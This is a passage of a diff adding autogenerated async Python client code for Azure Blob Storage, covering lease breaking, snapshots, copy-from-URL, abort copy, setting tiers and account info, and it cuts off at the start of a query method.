lease period elapses, and an infinite lease + breaks immediately. Default value is None. + :type break_period: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "break". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "break") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_break_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + timeout=timeout, + break_period=break_period, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.break_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-time']=self._deserialize('int', response.headers.get('x-ms-lease-time')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + break_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def create_snapshot( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + metadata: Optional[Dict[str, str]] = None, + request_id_parameter: Optional[str] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Create Snapshot operation creates a read-only snapshot of a blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword comp: comp. Default value is "snapshot". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "snapshot") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _lease_id = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_create_snapshot_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + metadata=metadata, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.create_snapshot.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-snapshot']=self._deserialize('str', response.headers.get('x-ms-snapshot')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + create_snapshot.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def start_copy_from_url( # pylint: disable=inconsistent-return-statements + self, + copy_source: str, + timeout: Optional[int] = None, + metadata: Optional[Dict[str, str]] = None, + tier: Optional[Union[str, "_models.AccessTierOptional"]] = None, + rehydrate_priority: Optional[Union[str, "_models.RehydratePriority"]] = None, + request_id_parameter: Optional[str] = None, + blob_tags_string: Optional[str] = None, + seal_blob: Optional[bool] = None, + immutability_policy_expiry: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] = None, + legal_hold: Optional[bool] = None, + source_modified_access_conditions: Optional["_models.SourceModifiedAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Start Copy From URL operation copies a blob or an internet resource to a new blob. + + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param rehydrate_priority: Optional: Indicates the priority with which to rehydrate an archived + blob. Default value is None. + :type rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param seal_blob: Overrides the sealed state of the destination blob. Service version + 2019-12-12 and newer. Default value is None. + :type seal_blob: bool + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + _source_if_tags = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _lease_id = None + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + _source_if_tags = source_modified_access_conditions.source_if_tags + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_start_copy_from_url_request( + url=self._config.url, + version=self._config.version, + copy_source=copy_source, + timeout=timeout, + metadata=metadata, + tier=tier, + rehydrate_priority=rehydrate_priority, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + source_if_tags=_source_if_tags, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + seal_blob=seal_blob, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.start_copy_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + start_copy_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def copy_from_url( # pylint: disable=inconsistent-return-statements + self, + copy_source: str, + timeout: Optional[int] = None, + metadata: Optional[Dict[str, str]] = None, + tier: Optional[Union[str, "_models.AccessTierOptional"]] = None, + request_id_parameter: Optional[str] = None, + source_content_md5: Optional[bytearray] = None, + blob_tags_string: Optional[str] = None, + immutability_policy_expiry: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] = None, + legal_hold: Optional[bool] = None, + copy_source_authorization: Optional[str] = None, + copy_source_tags: Optional[Union[str, "_models.BlobCopySourceTags"]] = None, + source_modified_access_conditions: Optional["_models.SourceModifiedAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + **kwargs: Any + ) -> None: + """The Copy From URL operation copies a blob or an internet resource to a new blob. It will not + return a response until the copy is complete. + + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param copy_source_tags: Optional, default 'replace'. Indicates if source tags should be + copied or replaced with the tags specified by x-ms-tags. Default value is None. + :type copy_source_tags: str or ~azure.storage.blob.models.BlobCopySourceTags + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :keyword x_ms_requires_sync: This header indicates that this is a synchronous Copy Blob From + URL instead of a Asynchronous Copy Blob. Default value is "true". Note that overriding this + default value may result in unsupported behavior. + :paramtype x_ms_requires_sync: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + x_ms_requires_sync = kwargs.pop('x_ms_requires_sync', "true") # type: str + + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _lease_id = None + _encryption_scope = None + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + + request = build_copy_from_url_request( + url=self._config.url, + x_ms_requires_sync=x_ms_requires_sync, + version=self._config.version, + copy_source=copy_source, + timeout=timeout, + metadata=metadata, + tier=tier, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + source_content_md5=source_content_md5, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + copy_source_authorization=copy_source_authorization, + encryption_scope=_encryption_scope, + copy_source_tags=copy_source_tags, + template_url=self.copy_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + copy_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def abort_copy_from_url( # pylint: disable=inconsistent-return-statements + self, + copy_id: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Abort Copy From URL operation aborts a pending Copy From URL operation, and leaves a + destination blob with zero length and full metadata. + + :param copy_id: The copy identifier provided in the x-ms-copy-id header of the original Copy + Blob operation. + :type copy_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword comp: comp. Default value is "copy". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword copy_action_abort_constant: Copy action. Default value is "abort". Note that + overriding this default value may result in unsupported behavior. + :paramtype copy_action_abort_constant: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "copy") # type: str + copy_action_abort_constant = kwargs.pop('copy_action_abort_constant', "abort") # type: str + + _lease_id = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_abort_copy_from_url_request( + url=self._config.url, + comp=comp, + copy_action_abort_constant=copy_action_abort_constant, + version=self._config.version, + copy_id=copy_id, + timeout=timeout, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.abort_copy_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [204]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + abort_copy_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def set_tier( # pylint: disable=inconsistent-return-statements + self, + tier: Union[str, "_models.AccessTierRequired"], + snapshot: Optional[str] = None, + version_id: Optional[str] = None, + timeout: Optional[int] = None, + rehydrate_priority: Optional[Union[str, "_models.RehydratePriority"]] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Set Tier operation sets the tier on a blob. The operation is allowed on a page blob in a + premium storage account and on a block blob in a blob storage account (locally redundant + storage only). A premium page blob's tier determines the allowed size, IOPS, and bandwidth of + the blob. A block blob's tier determines Hot/Cool/Archive storage type. This operation does not + update the blob's ETag. + + :param tier: Indicates the tier to be set on the blob. + :type tier: str or ~azure.storage.blob.models.AccessTierRequired + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param rehydrate_priority: Optional: Indicates the priority with which to rehydrate an archived + blob. Default value is None. + :type rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "tier". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "tier") # type: str + + _lease_id = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_tags = modified_access_conditions.if_tags + + request = build_set_tier_request( + url=self._config.url, + comp=comp, + version=self._config.version, + tier=tier, + snapshot=snapshot, + version_id=version_id, + timeout=timeout, + rehydrate_priority=rehydrate_priority, + request_id_parameter=request_id_parameter, + lease_id=_lease_id, + if_tags=_if_tags, + template_url=self.set_tier.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200, 202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + if response.status_code == 200: + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + + if response.status_code == 202: + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_tier.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def get_account_info( # pylint: disable=inconsistent-return-statements + self, + **kwargs: Any + ) -> None: + """Returns the sku name and account kind. + + :keyword restype: restype. Default value is "account". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_account_info_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + template_url=self.get_account_info.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-sku-name']=self._deserialize('str', response.headers.get('x-ms-sku-name')) + response_headers['x-ms-account-kind']=self._deserialize('str', response.headers.get('x-ms-account-kind')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_account_info.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def query( + self, + snapshot: Optional[str] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + 